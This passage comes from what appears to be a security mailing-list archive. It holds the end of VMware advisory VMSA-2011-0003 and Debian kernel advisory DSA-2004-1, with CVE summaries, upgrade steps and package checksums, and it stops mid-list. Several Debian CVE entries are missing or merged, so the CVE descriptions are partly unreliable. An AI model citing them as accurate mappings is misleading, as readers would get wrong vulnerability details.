VMware vSphere Client File type: .exe md5sum: cb6aa91ada1289575355d79e8c2a9f8e sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESX410-Update01 contains the following security bulletins: ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL, Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904 ESX410-201101226-SG (glibc) | http://kb.vmware.com/kb/1031330

ESX410-Update01 also contains the following non-security bulletins ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG, ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG, ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG, ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG, ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG, ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG.

To install an individual bulletin use esxupdate with the -b option.

  1. References

CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574


  1. Change log

2011-02-10 VMSA-2011-0003 Initial security advisory in conjunction with the release of vCenter Server 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1 Update 1, and ESX 4.1 Update 1 on 2011-02-10.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2011 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)

iEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9 dxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX =2pVj -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-2004-1 security@debian.org http://www.debian.org/security/ Dann Frazier February 27, 2010 http://www.debian.org/security/faq


Package : linux-2.6.24 Vulnerability : privilege escalation/denial of service/sensitive memory leak Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2009-2691 CVE-2009-2695 CVE-2009-3080 CVE-2009-3726 CVE-2009-3889 CVE-2009-4005 CVE-2009-4020 CVE-2009-4021 CVE-2009-4138 CVE-2009-4308 CVE-2009-4536 CVE-2009-4538 CVE-2010-0003 CVE-2010-0007 CVE-2010-0291 CVE-2010-0410 CVE-2010-0415 CVE-2010-0622

NOTE: This kernel update marks the final planned kernel security update for the 2.6.24 kernel in the Debian release 'etch'. Although security support for 'etch' officially ended on Feburary 15th, 2010, this update was already in preparation before that date. Local users may be able to read this data for setuid processes while the ELF binary is being loaded.

CVE-2009-2695

Eric Paris provided several fixes to increase the protection
provided by the mmap_min_addr tunable against NULL pointer
dereference vulnerabilities.

CVE-2009-3080

Dave Jones reported an issue in the gdth SCSI driver.

CVE-2009-3726

Trond Myklebust reported an issue where a malicious NFS server
could cause a denial of service condition on its clients by
returning incorrect attributes during an open call.

CVE-2009-3889

Joe Malicki discovered an issue in the megaraid_sas driver. 
Insufficient permissions on the sysfs dbg_lvl interface allow
local users to modify the debug logging behavior.

CVE-2009-4005

Roel Kluin discovered an issue in the hfc_usb driver, an ISDN
driver for Colognechip HFC-S USB chip. A potential read overflow
exists which may allow remote users to cause a denial of service
condition (oops).

CVE-2009-4020

Amerigo Wang discovered an issue in the HFS filesystem that would
allow a denial of service by a local user who has sufficient
privileges to mount a specially crafted filesystem. Avati discovered an issue in the fuse subsystem.  For this to be exploitable, the local user must
have sufficient privileges to mount a filesystem.

CVE-2009-4536 & CVE-2009-4538

Fabian Yamaguchi reported issues in the e1000 and e1000e drivers
for Intel gigabit network adapters which allow remote users to
bypass packet filters using specially crafted Ethernet frames.

CVE-2010-0003

Andi Kleen reported a defect which allows local users to gain read
access to memory reachable by the kernel when the
print-fatal-signals option is enabled. This option is disabled by
default.

CVE-2010-0007

Florian Westphal reported a lack of capability checking in the
ebtables netfilter subsystem. If the ebtables module is loaded,
local users can add and modify ebtables rules.

CVE-2010-0410

 Sebastian Krahmer discovered an issue in the netlink connector
 subsystem that permits local users to allocate large amounts of
 system memory resulting in a denial of service (out of memory).

CVE-2010-0415

Ramon de Carvalho Valle discovered an issue in the sys_move_pages
interface, limited to amd64, ia64 and powerpc64 flavors in Debian.

CVE-2010-0622

Jermome Marchand reported an issue in the futex subsystem that
allows a local user to force an invalid futex state which results
in a denial of service (oops).

For the oldstable distribution (etch), this problem has been fixed in version 2.6.24-6~etchnhalf.9etch3.

We recommend that you upgrade your linux-2.6.24 packages.

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch


Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc Size/MD5 checksum: 5118 e05bb21e7655cbfa39aed8d4fd6842eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz Size/MD5 checksum: 4099250 127bad8d653046d37fc52115d4e3a332 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af

Architecture independent packages:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 4263554 6c56ff077d17eba766af47544ce0f414 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 83890 62cfd18ed176359831502e70d80b291a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 46871628 328ad30d3c07f90c56d821f76e186b40 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 1550090 1f114fdc3123f135017dbdcd0e4839c6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 1009878 c7b7abff092940a400703b9168e46daa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 98248 a2a391008f8855d8358d5f18d9d76044

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329786 a212d2b3a94f8a04611c0f20d3d324b9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 27236282 b5bc553c4bf3a49843c45814fab72443 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 83428 f5f27b9de4905239e6315c77393f1f03 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 83454 5d152b5b6aa505982ebc7122a770b29b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 26641900 c799e7d48937975036b46edf032ecd87 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 26620162 eb1c3c27f1ac81959dc0f2ab497aee35 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 3455268 da2d2cc2b7c4253ac408c30fcfddb28f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329788 f589f8815f7adf02f8884e2dd3ac613f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329336 14bf085655b30adc8ab8f6ed4207d415

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 19482308 c49d2962c1a391fb00fb1b5f0598b24e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 3656476 f2f5de65037664d03208fcea83bf2ee2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 83422 600c7216143f43f9c61b0c2ccd118ea0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 83434 36f1d8f21ec39a473536dbeda2332e62 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 346940 d3f12fdd61f90749fdd08d857b326327

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 9357734 3e1165a0795d7db5f7ed8ef84205064b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 298744 50d8bfa3c06134e190409399a36c5aa9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 83546 1742ab93afadd1827009bf1d714e76eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 83578 07906e33f9ad267d986991c93eef1048 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 10778670 cc38a718ad5fd1c6e92d23e416610bd6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 308138 34dbc7720b1844833f0b71aa307c37fa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 310714 6a2c6fbbc1dd000b8a532227e3b8b5ae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 3939512 91c2ba626e754fe407d6dcf3fa01337a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 10786892 4d44a4ff751969855a01ad754a7c2b22

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 14375048 fe6ed4dea09aa205d801476667ef03cb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 13847788 4adc3106a987d84e12215156a379f460 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 259624 ac09dcabb624984b7321a5f6b6dbef54 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 83578 e152e18748e5c80b6d06715db836cf83 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 260838 44bc8ad5796c124b53d85a8c3a4ed912 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 262420 ff0641f04c409dd606c34373e8e16269 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 14830990 cce09e8022bee915dcde5dd8b9525428 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 13333594 a4dc863b0c84b9006c723db9a581c92e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 83546 990eb24056c7f6a63a4d55ec39563bae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 3446386 6ebfa4544252648df48cfb085cc3d2cc http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 258962 75184bed1f0b42cd8e002f93ed42198a

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 3656680 c5499cb98cdcdcadc48e3aa5bdf1d379 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19214268 e3f564cae5a85355f4b5a9248a11af98 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19148424 dd1d713c896888370a1667a16571c08c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 346982 6a6a08f74f9690705e6d770d1f3f2566 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 359548 b10fe011746b0df5fbd2587292af34ae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19482314 5d9cc150e340aea40e253a757cfdc423 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 83452 32a1614212e964a4423b161b34cd758d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19213598 4f459c2d2cdb87a6f945cbee7d4500d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 358212 58ba32b0701643f043ab38a487cae609 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 83424 c1e8493aff96df5b0fe33f5af4686f98 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 358752 4e3e9ef18a14fd191444591df571f80c

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 3569470 9ae824064bfc785f4b3512db78119e46 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 32206374 badd40dd68e2c6634c65f79d9536e34d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 83432 64a48fa9283b1741e22f0a22dbb93b20 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 83456 235a5572d5e109a4b575080a8262dc57 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 319938 d7dc0120458e93119879dcdd1e48017e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 32025762 7595d7dc21d3273f46b35b8c00b0e195 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 320226 34731a37b519d726b133093e04d937c3

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 22243472 532341ea0847ea19414413f7659ff13d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 248638 ce9da5c377d6328e9bb9be1c3945fff8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 12001172 817c44fd5afbeef1b9f172522ff21bcb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 10553972 20ddd95631b93efd52ae0aa38a5cd6d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 83600 a7b66d71779dea207a3d49cb9f692fdb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 27858364 54998117445c20f413331d1197355745 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 17212542 bf6c996fd387eef151e0db60d1bd00f2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 313302 314b57dc807eb91f617c10b1497e1617 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 314602 2c127076bf189be2836a4c3a4c7736af http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 3804368 fbcb3bdd668db166ad3f08e6dbfbc6e0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 17194888 9bce41a8b9936a16a3aa9cca675b9638 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 83540 8acdb1b4a4bc57f55b9cc5b2b04043a4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 229412 